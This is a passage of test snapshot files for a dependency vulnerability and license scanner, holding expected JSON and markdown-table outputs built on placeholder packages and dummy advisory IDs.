} ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "5.9.0", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev", "optional" ], "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" 
} ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" 
} ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" } }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" } } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" } }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" } } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" } }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "NuGet" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "author3/mine3", "version": "0.4.1", "ecosystem": "Packagist" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "4.3" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "experimental_analysis": { "OSV-5": { "called": true, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" 
} ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "NuGet" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "author3/mine3", "version": "0.4.1", "ecosystem": "Packagist" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "experimental_analysis": { "OSV-3": { "called": true, "unimportant": false } }, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist", "commit": "123abc" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" 
} ] }, { "package": { "name": "mine1", "version": "", "ecosystem": "npm", "commit": "abcxyz" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "NuGet" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "author3/mine3", "version": "0.4.1", "ecosystem": "Packagist" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/no_sources - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": true, "unimportant": false } }, "max_severity": "" }, { "ids": [ "GHSA-123" ], "aliases": null, "experimental_analysis": { "GHSA-123": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", 
"severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "9" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": true, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1", "GHSA-123" ], "aliases": [ "OSV-1", "GHSA-123" ], "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "aliases": [ "OSV-1" ], "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1", "GHSA-123" ], "aliases": [ "OSV-1", "GHSA-123" ], "max_severity": "8.3" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "aliases": [ "OSV-1" ], "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1", "GHSA-123" ], "aliases": [ "OSV-1", "GHSA-123" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "aliases": [ "OSV-1" ], "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm", "commit": "abc123" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "", "ecosystem": "npm", "commit": "abc123" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "details": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "id": "OSV-1" } ] }, { "package": { "name": "mine3", "version": "0.10.2-rc", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "5.9.0", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: internal/output/__snapshots__/markdowntable_test.snap ================================================ [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 
0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT, Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
